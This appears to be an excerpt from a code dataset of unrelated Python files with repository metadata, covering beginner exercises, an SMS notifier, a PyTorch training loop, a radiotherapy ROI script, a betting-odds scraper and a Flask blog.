client.\n\n Args:\n message: String up to 1.6k in length. This is the message that will be\n sent via SMS.\n credentials: Dict containing keys `ACCOUNT_SID` and `AUTH_TOKEN` that\n are associated with an active Twilio user.\n\n Returns:\n sms_message: Twilio SMS messsage object. 
This can be used to track\n delivery status of the message.\n '''\n if not client:\n raise ValueError('No API client found.')\n if not from_phone_number:\n raise ValueError('No from-phone-number found.')\n if not to_phone_number:\n raise ValueError('No to-phone-number found.')\n if not message:\n raise ValueError('No message found.')\n\n sms_message = None\n try:\n sms_message = client.messages.create(\n to=to_phone_number,\n body=message,\n from_=from_phone_number)\n except Exception as e:\n LOGGER.warning('There was a problem when sending SMS message: %s', e)\n\n return sms_message\n\n@backoff.on_predicate(backoff.fibo, lambda status: status != 'delivered', max_value=13)\ndef confirm_sms_delivery(client, sms_message=None):\n '''\n Fetches current SMS message status value from the Twilio REST API\n\n Args:\n - sms_message: Twilio SMS object.\n\n Returns:\n - status: String that confirms final delivery of the SMS message.\n '''\n status = None\n if sms_message is not None:\n sms_message_updated = client.messages.get(sms_message.sid).fetch()\n status = sms_message_updated.status\n\n return status\n\ndef run(message=None):\n '''\n Run method for module.\n\n Args:\n message: String. It is possible to run this method via another script\n by importing as a module.\n -m or --message: Optional CLI arguments can also be passed to use this\n script in a stand-alone fashion.\n '''\n if not message:\n args = argparse.ArgumentParser()\n args.add_argument('-m', '--message', dest='message', required=False,\n nargs='*', help='Enter the message that you want to \\\nhave sent. Up to 1.6k characters is supported.')\n message = ' '.join(args.parse_args().message)\n\n try:\n credentials = get_sms_credentials()\n client = Client(credentials['ACCOUNT_SID'], credentials['AUTH_TOKEN'])\n from_phone_number = credentials['FROM_PHONE_NUMBER']\n to_phone_number = credentials['TO_PHONE_NUMBER']\n sms_message = send_sms_message(client, from_phone_number, to_phone_number, message)\n status = confirm_sms_delivery(client, sms_message)\n\n message_short_ver = message[:30] + '...'\n if status == 'delivered':\n LOGGER.info('Successfully sent message: \"%s\"',\n message_short_ver)\n else:\n LOGGER.warning('Issue sending message: \"%s\". 
Message status: %s',\n message_short_ver, status)\n except Exception as e:\n print('Error sending message: %s' % e)\n LOGGER.warning('Error sending message: %s', e)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"cmdrchris/python_learning","sub_path":"text_myself.py","file_name":"text_myself.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25878583607","text":"import random\r\n\r\n\r\nclass coin:\r\n def __init__(self, heads, tails):\r\n self.heads = heads\r\n self.tails = tails\r\n\r\n\r\ncoin1 = coin(\"Heads\", \"Tails\")\r\n\r\nflip = True\r\nflipCounter = 0\r\n\r\n\r\n# headsCounter = 0\r\n# tailsCounter = 0\r\n\r\ndef rollDice():\r\n side = random.randint(1, 2)\r\n\r\n if side == 1:\r\n print(\"You got\", coin1.heads)\r\n # headsCounter=headsCounter+1\r\n else:\r\n print(\"You got\", coin1.tails)\r\n # tailsCounter=tailsCounter+1\r\n\r\n\r\ndef stop():\r\n print(\"You flipped\", flipCounter, \"coins.\")\r\n # print(\"You got\",headsCounter,\"heads and\",tailsCounter,\"tails.\")\r\n\r\n\r\nwhile flip:\r\n choice = raw_input(\"Press ENTER to flip a coin, or press q to exit: \")\r\n print(\"\")\r\n\r\n if choice == \"q\":\r\n stop()\r\n flip = False\r\n\r\n else:\r\n rollDice()\r\n flipCounter = flipCounter + 1\r\n\r\n","repo_name":"lucashernandezv/experiment","sub_path":"coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70084800748","text":"import re\r\n\r\nh, w = map(int,input().split())\r\ns = []\r\nans = 0\r\n\r\nfor c1 in range(h):\r\n box = ( input() )\r\n tmp = []\r\n for c2 in range( len(box) ):\r\n if box[c2] == \"#\":\r\n tmp.append(int(1))\r\n else :\r\n tmp.append(int(0))\r\n s.append(tmp)\r\n\r\nfor c1 in range(h):\r\n for c2 in range(w):\r\n if s[c1][c2] == 1:\r\n for c3 in range(w):\r\n if (s[c1][c3] == 0):\r\n s[c1][c3] = 2\r\n for c3 in range(h):\r\n if (s[c3][c2] == 0):\r\n s[c3][c2] = 2\r\n \r\n\r\nfor c1 in range(h):\r\n ans = ans + sum([i > 0 for i in s[c1]])\r\nprint(ans)","repo_name":"0-ayano/Study-CP","sub_path":"B096_爆���の大爆発.py","file_name":"B096_爆弾の大爆発.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39334746465","text":"import torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader\n\nimport sys\nsys.path.append('..')\n\nfrom dataset.ImageDataset import ImageDataset\nfrom models.model import torch_model\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nBATCH_SIZE = 16\nFEATURE_SIZE = 10\nDATA_SIZE = 1500\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\ndef train_loop():\n dataset = ImageDataset('/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/circle_label.json',\\\n '/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/rectangle_label.json',\\\n '/lustre/S/gaomj/bachelor/BoxEmbedding-Application/POE/dataset/data/labels/triangle_label.json')\n dataloader = DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, num_workers=16)\n poe_model = torch_model(DATA_SIZE+FEATURE_SIZE, device).to(device)\n optimizer = Adam(poe_model.parameters(), lr=1e-3)\n all_color = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\n running_loss = last_loss = 0\n with open('log_image_train.txt', 'w')as f:\n 
f.write('Begin Training.\\n')\n \n for epoch in range(50):\n for i, image_dict in enumerate(dataloader):\n t1x = torch.tensor(image_dict['index']).to(device)\n color_idx = torch.tensor(image_dict['color']).to(device)\n shape_idx = torch.tensor(image_dict['shape'] + len(all_color)).to(device)\n pos_prob_color, _ = poe_model.forward((t1x, color_idx))\n pos_prob_shape, _ = poe_model.forward((t1x, shape_idx))\n \n loss = (torch.sum(pos_prob_color) + torch.sum(pos_prob_shape)) / BATCH_SIZE\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n if i % 50 == 49:\n last_loss = running_loss / 100\n print(f\"epoch {epoch} batch {i} Loss {last_loss}\")\n with open(\"log_image_train.txt\", \"a\") as f:\n f.write(f\"epoch {epoch} batch {i} Loss {last_loss}\\n\")\n running_loss = 0\n pass\n \n torch.save(poe_model.state_dict(), 'image_ckpt.pth.tar')\n \nif __name__ == \"__main__\":\n train_loop()\n \n ","repo_name":"GasaiYU/BoxEmbedding-Application","sub_path":"POE/experiment/train_img.py","file_name":"train_img.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40501437125","text":"# encoding: utf8\n\n# Import local files:\nimport colors as COLORS\nimport def_oars as DEF\nimport margins as MARGINS\nimport roi as ROI\nimport rois as ROIS\n\n# Definitions script for bladder treatments.\nclass DefBladder(object):\n\n # Adds target and OAR ROIs to the given site and creates them in RayStation.\n def __init__(self, pm, examination, ss, choices, site):\n # Choice 1: Intent\n intent = choices[1]\n if intent == 'palliative':\n # Targets:\n ctv = ROI.ROIAlgebra(ROIS.ctv.name, ROIS.ctv.type, COLORS.ctv_low, sourcesA=[ROIS.gtv_p], sourcesB=[ROIS.bladder], marginsA = MARGINS.uniform_5mm_expansion, marginsB = MARGINS.zero)\n ptv = ROI.ROIAlgebra(ROIS.ptv.name, ROIS.ptv.type, ROIS.ptv.color, sourcesA = [ctv], sourcesB = [ROIS.external], operator = 'Intersection', marginsA = MARGINS.bladder_expansion, marginsB = MARGINS.uniform_5mm_contraction)\n site.add_targets([ROIS.gtv_p, ctv, ptv])\n else:\n # Curative:\n # Targets:\n ctv_p = ROI.ROIExpanded(ROIS.ctv_p.name, ROIS.ctv_p.type, COLORS.ctv, source = ROIS.gtv_p, margins = MARGINS.uniform_5mm_expansion)\n ctv_e = ROI.ROIExpanded(ROIS.ctv_e.name, ROIS.ctv_e.type, COLORS.ctv, source = ROIS.bladder, margins = MARGINS.zero)\n ctv = ROI.ROIAlgebra(ROIS.ctv.name, ROIS.ctv.type, COLORS.ctv, sourcesA=[ctv_p], sourcesB=[ctv_e], marginsA = MARGINS.zero, marginsB = MARGINS.zero)\n ptv = ROI.ROIAlgebra(ROIS.ptv.name, ROIS.ptv.type, ROIS.ptv.color, sourcesA = [ctv], sourcesB = [ROIS.external], operator = 'Intersection', marginsA = MARGINS.bladder_expansion, marginsB = MARGINS.uniform_5mm_contraction)\n site.add_targets([ROIS.gtv_p, ctv_p, ctv_e, ctv, ptv])\n # DL OARs:\n examination.RunOarSegmentation(ModelName=\"RSL Male Pelvic CT\", ExaminationsAndRegistrations={ examination.Name: None }, RoisToInclude=[\"Bladder\", \"FemoralHead_L\", \"FemoralHead_R\", \"Rectum\"])\n # Non-DL OARs:\n site.add_oars([ROIS.bowel_space])\n # Create all targets and OARs in RayStation:\n site.create_rois()\n","repo_name":"Code-Quark/raystation-scripts","sub_path":"def_regions/def_bladder.py","file_name":"def_bladder.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72740674986","text":"\"\"\"\nlinklist.py\n功能:实现单链表的构建和功能操作\n重点代码\n\"\"\"\n\n#创建节点类\nclass Node:\n 
\"\"\"\n 思路:将自定义的类视为节点的生成类,实力对象中包含数据部分和指向下一个节点的next\n\n \"\"\"\n def __init__(self, value, next=None):\n self.value = value # 有用数据\n self.next = next # 循环下一个节点关系\n\n# node1 = Node(1)\n# node2 = Node(node1)\n# node3 = Node(node2)\n#\n\nclass LinkList:\n \"\"\"\n 思路:单链表类,生成对象可以进行増删改查\n \"\"\"\n def __init__(self):\n self.head=Node(None)\n\n\n# l=LinkList()\n# node=Node(1)\n# l.head.next=node\n#\n# print(l.head.next.value)\n def init_list(self,list_):\n p= self.head\n for item in list_:\n p.next=Node(item)\n p=p.next\n def show(self):\n p=self.head.next\n while p is not Node:\n print(p.value)\n p=p.next\n\nl=LinkList()\nl.init_list([1,2,3,4,5])\nl.show()\n\n\n\n\n\n\n","repo_name":"KaiyAngo/kaiyang","sub_path":"linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42092437622","text":"n = int(input())\nmove_type = list(map(str, input().split()))\n\nx, y = 1, 1 # 현재 위치\ndirection = ['L','R','U','D']\ndx = [0, 0, -1, 1] # L, R, U, D에 따른 이동 방향\ndy = [-1, 1, 0, 0]\n\nfor move in move_type: # 이동 계획을 하나씩 확인\n for i in range(len(direction)):\n if move == direction[i]:\n nx = x + dx[i]\n ny = y + dy[i]\n\n if nx >= 1 and nx <= n and ny >= 1 and ny <= n: # 공간을 벗어나지 않는다면\n x = nx\n y = ny\n\nprint(x, y)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"이것이 코딩테스트다/구현/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"si","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23541718736","text":" # 랜덤 함수\n\n# 1. Clear 0000\n# 1 ~ 20 사이의 양의 정수중 \n# 난수 값 20 개 생성 후\n# List에 저장 \n#----------------------------------------------------------------\n# 2.\n# List 내 원소 값에 대한 \n# 합계, 평균, 최대 값, 최소 값 출력 \n#----------------------------------------------------------------\n# 3. \n# List 내 중복 값과 중복 횟수 정보 출력\n\n# 4. \n# 구간 별 히스토그램 정보 출력\n\n\n# < 1번 >\n\n# random 함수를 쓰기위해 import 선언! \nimport random\n# List 공간 만들기\nMyList = [ ]\n# 1-1. 1~20 사이를 만들 반복문(for) 작성\nfor Value in range (20) :\n# 1-2. 난수 값 무작위로 20개 생성\n ransuu=int(random.random() * 20) +1 \n# 1-3.List 공간 만들기 \n MyList.append(ransuu) # ex) MyList = [16, 15, 9, 9, 9,..... ]\n\n# 출력문 :랜덤 값 \nprint(\"랜덤 값 : \")\n# 반복해서 랜덤 값을 뽑을 \nfor RandomValue in range(len(MyList)) :\n result = MyList[RandomValue]\n print(\"\\t \",result, \" \", end=\"\")\n if RandomValue == len(MyList)//2-1 :\n print ()\n\n#----------------------------------------------------------------\n\n#2 번 으로 가기전에 띄워 쓰기 \nprint()\n# < 2번 >\n\n# 반복 적으로 list 안에 있는 값들을 추출\n# 最小 값 \nMax = MyList[RandomValue-1]\n# 最大 값 \nMin = MyList[RandomValue-1]\n# 합계 담을 변수 공간 \nSum = 0\nfor RandomValue in range(len(MyList)) :\n atai = MyList[RandomValue]\n Sum += atai\n # 最小\n if Min < MyList[RandomValue] :\n Min = Min\n else :\n Min = MyList[RandomValue]\n\n # 最大\n if Max >= MyList[RandomValue] :\n Max = Max \n else :\n Max = MyList[RandomValue]\n# for Value in MyList : \n \n# 2-1. 최소 값\nprint(\"최소 값\\t:\",Min)\n# 2-2. 최대 값\nprint(\"최대 값\\t:\",Max)\n# 2-3. 합계\nprint(\"합계\\t:\",Sum)\n# 2-4. 평균\nprint(\"평균\\t:\",Sum/len(MyList))\n\n#----------------------------------------------------------------\n\n# < 3번 >\n\n# 출력 단어 -> 중복 값 중복 회수\nprint(\"중복 값 중복 회수\")\n\n# 중복 횟수 측정 할 변수\ncount = 0\n# 1. 리스트의 안의 요소들과 비교할 1~20까지의 고정 숫자 뽑기\nfor duplicated in range(len(MyList)) : \n # 2. 
+{"seq_id":"23541718736","text":" # Random functions\n\n# 1. Clear 0000\n# Generate 20 random positive integers\n# between 1 and 20\n# and store them in a list \n#----------------------------------------------------------------\n# 2.\n# For the values in the list, print\n# the sum, average, maximum and minimum \n#----------------------------------------------------------------\n# 3. \n# Print the duplicated values in the list and how often they repeat\n\n# 4. \n# Print histogram information per value range\n\n\n# < Part 1 >\n\n# import declaration needed to use the random functions! \nimport random\n# create the list\nMyList = [ ]\n# 1-1. loop (for) that covers the 1~20 range\nfor Value in range (20) :\n# 1-2. generate 20 random values\n    ransuu=int(random.random() * 20) +1 \n# 1-3. fill the list \n    MyList.append(ransuu) # ex) MyList = [16, 15, 9, 9, 9,..... ]\n\n# output: random values \nprint(\"Random values : \")\n# loop that prints the random values one by one \nfor RandomValue in range(len(MyList)) :\n    result = MyList[RandomValue]\n    print(\"\\t \",result, \" \", end=\"\")\n    if RandomValue == len(MyList)//2-1 :\n        print ()\n\n#----------------------------------------------------------------\n\n# blank line before moving on to part 2 \nprint()\n# < Part 2 >\n\n# repeatedly pull the values out of the list\n# maximum \nMax = MyList[RandomValue-1]\n# minimum \nMin = MyList[RandomValue-1]\n# variable that accumulates the sum \nSum = 0\nfor RandomValue in range(len(MyList)) :\n    atai = MyList[RandomValue]\n    Sum += atai\n    # minimum\n    if Min < MyList[RandomValue] :\n        Min = Min\n    else :\n        Min = MyList[RandomValue]\n\n    # maximum\n    if Max >= MyList[RandomValue] :\n        Max = Max \n    else :\n        Max = MyList[RandomValue]\n# for Value in MyList : \n    \n# 2-1. minimum\nprint(\"Minimum\\t:\",Min)\n# 2-2. maximum\nprint(\"Maximum\\t:\",Max)\n# 2-3. sum\nprint(\"Sum\\t:\",Sum)\n# 2-4. average\nprint(\"Average\\t:\",Sum/len(MyList))\n\n#----------------------------------------------------------------\n\n# < Part 3 >\n\n# output header -> duplicated value / repeat count\nprint(\"Duplicate value   repeat count\")\n\n# variable that counts the repeats\ncount = 0\n# 1. pick the fixed numbers 1~20 to compare against the list elements\nfor duplicated in range(1, 21) : \n    # 2. inner loop that counts how often the number picked in 1. matches a list element\n    for element in MyList :\n        # compare with a condition -> fixed value vs element value\n        if duplicated == element :\n            # count 1 per match\n            count += 1\n    # condition: if the value is duplicated, print it together with its repeat count\n    if count>= 2 : \n        print(\" \",duplicated,\"\\t\",\" \",count)\n    # reset the count when the outer loop moves on\n    count = 0\n\n#----------------------------------------------------------------\n\n# < Part 4 >\n# print the histogram header\nprint(\"Histogram per range\")\n\n# counters increased when a value falls into the matching range\ncount1 = 0\ncount2 = 0\ncount3 = 0\ncount4 = 0\n# loop that pulls the elements out of the list one by one \n# conditions: the histogram ranges \nfor index in MyList :\n    # 1 ~ 5\n    if 0 < index < 6:\n        count1 += 1\n    # 6 ~ 10\n    elif 5< index < 11:\n        count2 += 1\n    # 11 ~ 15\n    elif 10< index < 16:\n        count3 += 1\n    # 16 ~ 20\n    else :\n        count4 += 1\nprint (\"1 ~ 5 : \",\"*\"*count1)\nprint (\"6 ~ 10 : \",\"*\"*count2)\nprint (\"11 ~ 15 : \",\"*\"*count3)\nprint (\"16 ~ 20 : \",\"*\"*count4)","repo_name":"Jaeil-Lee/1_Grade","sub_path":"1_Semester/Python/1. Summer Vacation_1-1/07.07 목 - 랜덤함수/7.7 랜덤함수_과제.py","file_name":"7.7 랜덤함수_과제.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23200925399","text":"import csv\nimport asyncio\nimport nest_asyncio\nfrom pyppeteer import launch\n#from pyppeteer_stealth import stealth\n\nSELECTOR = '#root > div.css-ynz9y9 > div:nth-child(2) > div > div.css-1633bsf > div > div.css-1pcha61 > div > div.css-1633bsf > div > table > tbody>tr'\nOLD_ARRAY = []\nNEW_ARRY = []\n\nasync def launch_webpage():\n    browser = await launch(headless=True, executablePath='/usr/bin/chromium-browser', args=['--no-sandbox'])\n    page = await browser.newPage()\n    try:\n        await page.goto('https://play.pakakumi.com/')\n        await page.waitForSelector(SELECTOR)\n        tr_elements = await page.querySelectorAll(SELECTOR)\n        with open('output/pakakumi_odds.csv', 'a', newline='') as csvfile:\n            csv_writer = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n            OLD_ARRAY.extend(NEW_ARRY)\n            NEW_ARRY.clear()\n            for tr_element in tr_elements:\n                text_content = await page.evaluate('(trElement) => trElement.textContent', tr_element)\n                NEW_ARRY.append(text_content.replace('x___',''))\n            set1 = set(NEW_ARRY)\n            set2 = set(OLD_ARRAY)\n            new_odds = list(set1.difference(set2))\n            print(f'New odds {new_odds}')\n            for odd in new_odds:\n                csv_writer.writerow(odd)\n    except:\n        pass\n    return browser\n\nasync def main(runs):\n    \n    while runs > 0:\n        print(f'{runs-1} Remaining...')\n        try:\n            browser = await launch_webpage()\n            await asyncio.sleep(45)\n            await browser.close()\n        except:\n            pass\n        runs = runs-1\n    \nnest_asyncio.apply()\nnew_loop = asyncio.new_event_loop()\nasyncio.get_event_loop_policy().set_event_loop(new_loop)\nnew_loop.run_until_complete(main(runs=10000))\n","repo_name":"samuelmunyoki/pakakumi_odds_scrapper","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"27762718947","text":"\"\"\"\"\"\nDAY 1 - 02\n\n\nConsidering every single measurement isn't as useful as you expected: there's just too much noise in the data.\n\nInstead, consider sums of a three-measurement sliding window. Again considering the above example:\n\n199 A \n200 A B \n208 A B C \n210 B C D\n200 E C D\n207 E F D\n240 E F G \n269 F G H\n260 G H\n263 H\nStart by comparing the first and second three-measurement windows. 
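(Side note: consecutive windows share two of their three measurements, so comparing neighbouring sums reduces to comparing the value dropped against the value added; over a fully parsed list, called depths here as an assumed name, the count is: increases = sum(1 for i in range(len(depths) - 3) if depths[i + 3] > depths[i]).)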
The measurements in the first window are marked A (199, 200, 208); their sum is 199 + 200 + 208 = 607. The second window is marked B (200, 208, 210); its sum is 618. The sum of measurements in the second window is larger than the sum of the first, so this first comparison increased.\n\nYour goal now is to count the number of times the sum of measurements in this sliding window increases from the previous sum. So, compare A with B, then compare B with C, then C with D, and so on. Stop when there aren't enough measurements left to create a new three-measurement sum.\n\nIn the above example, the sum of each three-measurement window is as follows:\n\nA: 607 (N/A - no previous sum)\nB: 618 (increased)\nC: 618 (no change)\nD: 617 (decreased)\nE: 647 (increased)\nF: 716 (increased)\nG: 769 (increased)\nH: 792 (increased)\nIn this example, there are 5 sums that are larger than the previous sum.\n\nConsider sums of a three-measurement sliding window. How many sums are larger than the previous sum?\n\"\"\"\"\"\n\ninput = open(\"d1-01_input.txt\", \"r\")\nlines = input.readlines()\n\nsumNumbers = []\nnumbers = []\nincreased = 0\ndecreased = 0\n\nfor line in lines:\n numbers.append(int(line))\n\n if len(numbers) < 3:\n continue\n\n newSum = numbers[0] + numbers[1] + numbers[2]\n sumNumbers.append(newSum)\n numbers.pop(0)\n\n if len(sumNumbers) < 2:\n print(f\"{int(line)} (N/A - no previous measurement)\")\n continue\n\n if sumNumbers[1] > sumNumbers[0]:\n increased += 1\n print(f\"{sumNumbers[1]} (increased)\")\n elif sumNumbers[1] < sumNumbers[0]:\n decreased += 1\n print(f\"{sumNumbers[1]} (decreased)\")\n else:\n print(f\"{sumNumbers[1]} (no change)\")\n sumNumbers.pop(0)\n \n\nprint(f\"Increased: {increased}\")\nprint(f\"Decreased: {decreased}\")\n","repo_name":"Neocky/advent-of-code","sub_path":"2021/Day 1/d1-02.py","file_name":"d1-02.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4802788852","text":"from Products.PythonScripts.standard import Object\nimport json\n\n# Get result lines\ntest_result_lines = context.objectValues(portal_type=\"Test Result Line\", sort_on='int_index')\n\n# Create a dict containing stats for each test\ntests = []\ncount = 0\nfor tl in test_result_lines:\n # Get and parse stdout to a dict\n stdout = tl.getProperty('stdout')\n if stdout:\n count = count + 1\n stdout_lines = filter(None, stdout.split('\\n'))\n current_stats = dict( [(l.split(\"=\")[0].replace(\" \", \"_\"), \\\n l.split(\"=\")[1].isdigit() and int(l.split(\"=\")[1]) or str(l.split(\"=\")[1])) \\\n for l in stdout_lines ])\n\n tests.append(current_stats)\n\ntest_suite = context.getPortalObject().test_suite_module.searchFolder(title=context.getTitle())[0]\n\nxs = map(int, test_suite.getGraphCoordinate())\n\n\nreturn json.dumps({\"test\": tests, \"xs\": xs})\n","repo_name":"yarec/erp5","sub_path":"bt5/erp5_test_result/SkinTemplateItem/portal_skins/erp5_test_result/TestResult_getJsonScalabilityStats.py","file_name":"TestResult_getJsonScalabilityStats.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42249541698","text":"'''\nWrite a program that picks a random integer from 1 to 100, and has players guess the number. 
The rules are:\nIf a player's guess is less than 1 or greater than 100, say \"OUT OF BOUNDS\"\nOn a player's first turn, if their guess is\nwithin 10 of the number, return \"WARM!\"\nfurther than 10 away from the number, return \"COLD!\"\nOn all subsequent turns, if a guess is\ncloser to the number than the previous guess return \"WARMER!\"\nfarther from the number than the previous guess, return \"COLDER!\"\nWhen the player's guess equals the number, tell them they've guessed correctly and how many guesses it took!\n'''\n\n\ndef guessing_game():\n    \n    import random\n    \n    print(\"WELCOME TO GUESS ME!\")\n    print(\"I'm thinking of a number between 1 and 100\")\n    print(\"If your guess is more than 10 away from my number, I'll tell you you're COLD\")\n    print(\"If your guess is within 10 of my number, I'll tell you you're WARM\")\n    print(\"If your guess is farther than your most recent guess, I'll say you're getting COLDER\")\n    print(\"If your guess is closer than your most recent guess, I'll say you're getting WARMER\")\n    print(\"LET'S PLAY!\")\n    \n    num=random.randint(1,100)\n    guess_list=[] #Creating lists for storing guesses and differences (to identify how far is the guess from no.)\n    differences=[]\n    while True:\n        \n        try:\n            guess=int(input('Enter your guess (only an integer) :'))\n        except:\n            print('Please enter a valid integer')\n            continue\n        else:\n            diff=abs(num-guess)\n            guess_list.append(guess)\n            differences.append(diff)\n            if guess in range(1,101):\n                if len(guess_list)==1 and len(differences)==1: #Checking condition for first guess\n                    if guess==num: #check the exact match first, since num itself lies inside the WARM band\n                        print('BINGO! You have won. It took you just 1 chance to guess correctly.')\n                        break\n                    elif guess in range(num-10,num+11):\n                        print('WARM')\n                        continue\n                    else:\n                        print('COLD')\n                        continue\n                elif len(guess_list)>1 and len(differences)>1: #Checking condition for subsequent guesses\n                    if guess==num and differences[-1]==0:\n                        print('BINGO! You have won. It took you just %s chances to guess correctly.'%(len(guess_list)))\n                        break\n                    elif differences[-1]<=differences[-2]:\n                        print('WARMER')\n                        continue\n                    else:\n                        print('COLDER')\n                        continue\n                \n            else:\n                print('OUT OF BOUNDS')\n                continue\n            break\n    \nguessing_game()","repo_name":"idubey-code/Python","sub_path":"GuessingGame.py","file_name":"GuessingGame.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6654853850","text":"from flask import Flask, render_template, request\nimport requests\nfrom datetime import datetime\nimport calendar\nfrom send_mail import SendMail\n\ncurrent_year = datetime.now().year\nall_objects = []\nall_date = []\nall_body = []\ntotal = len(all_objects)\nblog_url = \"https://api.npoint.io/4358ffbd346683abf0e4\"\nall_posts = requests.get(blog_url).json()\nfor post in all_posts:\n    all_objects.append(post)\n    day = post[\"date\"].split(\"-\")[0]\n    month = calendar.month_name[int(post[\"date\"].split(\"-\")[1])]\n    year = post[\"date\"].split(\"-\")[2]\n    date = (day, month, year)\n    all_date.append(date)\n    sentences = [sentence.replace(\".\", \"\") for sentence in post[\"body\"].split(\". 
\")]\n all_body.append(sentences)\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\", posts=all_objects, date=all_date)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n email = request.form[\"email\"]\n phone = request.form[\"phone\"]\n message = request.form[\"message\"]\n send_email = SendMail(name, email, phone, message)\n send_email.send_email()\n return render_template(\"contact.html\", data=True)\n else:\n return render_template(\"contact.html\")\n\n\n@app.route(\"/post/\")\ndef to_post(num):\n return render_template(\"post.html\", posts=all_objects, num=num, date=all_date, bodies=all_body)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"hadi-learn/CoursePython100DaysOfCode","sub_path":"day-60-blog-capstone-part-2b-mail/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30471809782","text":"\"\"\"Initiate clients.\"\"\"\nimport chart_studio\n\nfrom config import (\n ALPHA_VANTAGE_API_KEY,\n ALPHA_VANTAGE_CHART_BASE_URL,\n ALPHA_VANTAGE_PRICE_BASE_URL,\n IEX_API_BASE_URL,\n IEX_API_TOKEN,\n PLOTLY_API_KEY,\n PLOTLY_USERNAME,\n)\n\nfrom .crypto import CryptoChartHandler\nfrom .stock import StockChartHandler\n\n# Plotly chart studio authentication\nchart_studio.tools.set_credentials_file(\n username=PLOTLY_USERNAME, api_key=PLOTLY_API_KEY\n)\n\n# Create clients\nstock_chart_handler = StockChartHandler(token=IEX_API_TOKEN, endpoint=IEX_API_BASE_URL)\n\ncrypto_chart_handler = CryptoChartHandler(\n token=ALPHA_VANTAGE_API_KEY,\n price_endpoint=ALPHA_VANTAGE_PRICE_BASE_URL,\n chart_endpoint=ALPHA_VANTAGE_CHART_BASE_URL,\n)\n","repo_name":"toddbirchard/shibabot","sub_path":"clients/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16121375422","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\nif __name__ == '__main__':\n resolution_x, resolution_y = 1600, 1000\n sd.resolution = (resolution_x, resolution_y)\n\n\ndef snow(start_x=0, end_x=300, ground=100, height=50, quantity=100):\n for _ in range(quantity):\n x = sd.random_number(start_x, end_x)\n y = sd.random_number(ground, ground + height)\n length = sd.random_number(3, 10)\n sd.snowflake(center=sd.get_point(x, y), length=length)\n\n\nif __name__ == '__main__':\n sd.start_drawing()\n snow()\n sd.finish_drawing()\n sd.pause()","repo_name":"konkere/python_base","sub_path":"lesson_005/village_morning_static/snow.py","file_name":"snow.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31125953154","text":"#Unittest\nimport unittest as ut\nfrom unittest.mock import MagicMock\n\n#Constants\nfrom common import ut_constants\n\n#Test utils\nfrom tests.support.utils import get_args\n\n#Path parsing\nfrom pathlib import Path\n\n#Input parameters\nfrom operation.input import InputParameters, TrainingParameters, ImageGenerationParameters, update_params\n\nmodel_name = 'model_name'\ndataset_location = Path()\n\nnum_classes = 5\n\nclass TestUpdateParams(ut.TestCase):\n def test_update_params(self):\n #Arrange\n args = 
